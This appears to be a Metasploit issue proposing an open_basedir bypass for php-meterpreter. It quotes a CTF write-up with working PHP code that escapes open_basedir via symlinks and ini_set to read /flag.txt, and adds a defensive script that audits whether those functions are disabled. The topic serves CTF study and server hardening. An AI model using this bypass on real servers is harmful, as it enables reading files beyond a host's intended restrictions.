As discussed with @zeroSteiner, having a way to bypass PHP's open_basedir in php-meterpreter would be equally fun and dope. There are several ways to do this, like this one or Blaklis' latest bypass:
This challenge was about bypassing PHP open_basedir when having a restricted arbitrary PHP code execution. Most of the common functions to execute commands were blocked.
The initial solution that was intended used the following facts:
- open_basedir can be tampered with at runtime with ini_set, but is restricted by open_basedir itself (in other words, we should only be able to harden the existing rule)
- open_basedir works on symlinks
- the open_basedir checks are only done when ini_set is called to change the rule; the file system can change afterwards
That means that we can point open_basedir to a regular file under /tmp/, and then switch it to a symlink pointing to ../../../../[...] - but to create such a symlink, we need to create an arborescence that allows us to do so without breaching the rule:
```php
chdir('/tmp');
$x='';
for($i=0;$i<10;$i++){
    mkdir('z');
    chdir('z');
    $x.='../';
}
symlink($x,'x');
symlink($x,'y');
ini_set('open_basedir','x:y:/tmp/x');
rename('x',$x.'/x');
chdir('y');
chdir('x');
ini_set('open_basedir','/:/tmp/z');
echo file_get_contents('/flag.txt');
```
Congrats to all the solvers!
Blaklis
Here is how it could be implemented:
I'll likely tackle this at some point.
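The facts listed in the quoted write-up translate into a host-side check: the sequence only works where both a runtime open_basedir change and symlink creation are callable. The script below is an added example, not code from this issue or from Metasploit; the function names `disabled_set` and `audit_open_basedir` and the two sample settings are constructed for illustration, and the check covers only the sequence quoted on this page.

```php
<?php
// Added example, not code from the issue or from Metasploit.
// It checks only the sequence quoted on this page, which needs a runtime
// open_basedir change (ini_set) plus symlink creation (symlink).

/** Turn a disable_functions value into a lowercase lookup set. */
function disabled_set(string $raw): array
{
    $names = array_filter(array_map('trim', explode(',', strtolower($raw))));
    return array_fill_keys($names, true);
}

/** Return a list of findings for one open_basedir / disable_functions pair. */
function audit_open_basedir(string $openBasedir, string $disableFunctions): array
{
    if (trim($openBasedir) === '') {
        return ['open_basedir is empty: no path restriction is in force'];
    }
    $disabled = disabled_set($disableFunctions);
    $enabled = function (array $fns) use ($disabled): array {
        return array_values(array_filter($fns, function ($f) use ($disabled) {
            return !isset($disabled[$f]);
        }));
    };
    // ini_alter is PHP's alias of ini_set, so both count as "can tamper".
    $tamper = $enabled(['ini_set', 'ini_alter']);
    $links  = $enabled(['symlink']);

    $findings = [];
    if ($tamper) {
        $findings[] = 'runtime open_basedir change possible via: ' . implode(', ', $tamper);
    }
    if ($links) {
        $findings[] = 'symlink creation possible via: ' . implode(', ', $links);
    }
    if ($tamper && $links) {
        $findings[] = 'EXPOSED: both primitives used by the quoted sequence are callable';
    }
    return $findings;
}

// Constructed sample settings, then the live settings of this PHP process.
$samples = [
    'weak (constructed)'     => ['/var/www/site:/tmp', 'exec,system,passthru'],
    'hardened (constructed)' => ['/var/www/site:/tmp', 'exec,system,ini_set,ini_alter,symlink'],
    'live'                   => [(string) ini_get('open_basedir'), (string) ini_get('disable_functions')],
];
foreach ($samples as $label => [$basedir, $disabled]) {
    $out = audit_open_basedir($basedir, $disabled) ?: ['no finding for this sequence'];
    echo $label, ":\n  ", implode("\n  ", $out), "\n";
}
```

Run it under the same SAPI and pool as the application, since `ini_get` reports the values in effect for that process rather than what a particular php.ini file says.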